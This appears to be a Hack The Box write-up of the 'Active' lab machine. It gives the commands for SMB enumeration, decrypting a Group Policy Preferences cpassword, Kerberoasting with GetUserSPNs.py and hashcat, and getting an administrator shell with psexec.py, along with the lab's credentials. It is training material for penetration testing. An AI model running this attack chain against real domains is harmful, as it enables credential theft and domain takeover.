Write-Ups
  • Intro
  • Active Directory
    • HTB | Forest
    • HTB | Sauna
    • HTB | Active
    • HTB | Blackfield
    • HTB | Resolute
    • HTB | Cascade
    • HTB | Cicada
    • HTB | Administrator
    • HTB | Authority
    • HTB | Office
  • Windows
    • HTB | Devel
    • HTB | Chatterbox
    • HTB | SecNotes
    • HTB | Access
    • HTB | Jeeves
    • HTB | Artic
    • HTB | Bastard
    • HTB | Bastion
    • HTB | Querier
  • Linux
    • HTB | BoardLight
    • THM | CMess
    • THM | ConvertMyVideo
    • HTB | Editorial
    • HTB | Mirai
    • HTB | Nibbles
    • HTB | Help
    • HTB | SwagShop
    • HTB | Jarvis
    • HTB | Sea
    • HTB | Chemistry
Powered by GitBook
On this page
  • NMAP
  • SMB - TCP 139/445
  • Foothold/shell
  • Priv Esc
  1. Active Directory

HTB | Active

PreviousHTB | SaunaNextHTB | Blackfield

Last updated 6 months ago

This is the Box on Hack The Box Active Directory 101 Track. Find the box here.

Skill Learned

  • SMB enumeration techniques

  • Group Policy Preferences enumeration and exploitation

  • Identification and exploitation of Kerberoastable accounts

NMAP

IP: 10.10.10.100

nmap -sT -p- --min-rate 10000 10.10.10.100
nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,49152-49158,49165-49168 10.10.10.100

SMB - TCP 139/445

enum4linux -a 10.10.10.100

here we can see that we can enumerate Replication share, let's do that

smbclient //10.10.10.100/Replication -N

in the Replication share, we found Groups.xml

Foothold/shell

In Groups.xml we found the user and cpassword

GPP Passwords

Whenever a new Group Policy Preference (GPP) is created, there’s an xml file created in the SYSVOL share with that config data, including any passwords associated with the GPP. For security, Microsoft AES encrypts the password before it’s stored as cpassword. But then Microsoft published the key on MSDN.

Microsoft issued a patch in 2014 that prevented admins from putting passwords into GPP. But that patch doesn’t do anything about any of these breakable passwords that were already there, and from what I understand, pentesters still find these regularly in 2018. For more details, check out this AD Security post.

Since we have the password we can decrypt it using gpp-decrypt

With the username and password I can connect to 3 more share

smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18

Let's connect to Users share

smbclient //10.10.10.100/Users -U active.htb\SVC_TGS%GPPstillStandingStrong2k18

we found user.txt

Priv Esc

Since we have valid domain credentials, we can request a TGT (Ticket Granting Ticket)

GetUserSPNs.py active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip 10.10.10.100 -request

I’ll look up the hash type here(https://hashcat.net/wiki/doku.php?id=example_hashes), and then crack it with hashcat:

hashcat -m 13100 -a 0 GetUserSPNs.out /home/anurag/Downloads/rockyou.txt --force

and we found the password

since now we have administrator cred we can check for its share

smbmap -H 10.10.10.100 -d active.htb -u administrator -p Ticketmaster1968

Let's connect it via psexec

psexec.py administrator:'Ticketmaster1968'@10.10.10.100

we can also use smbclient to connect to C$ since we have read-and-write access

smbclient //10.10.10.100/C$ -U active.htb\administrator%Ticketmaster1968

We found the root.txt

nmap scan
enum4linux
smbclient to Replication
Groups.xml
Groups.xml
gpp-decrypt
smbmap via SVC_TGS
smbclient to SVC_TGS
user.txt
GetUserSPNs.py via SVC_TGS
hashcat
smbmap to administrator
psexec.py
smbclient
root.txt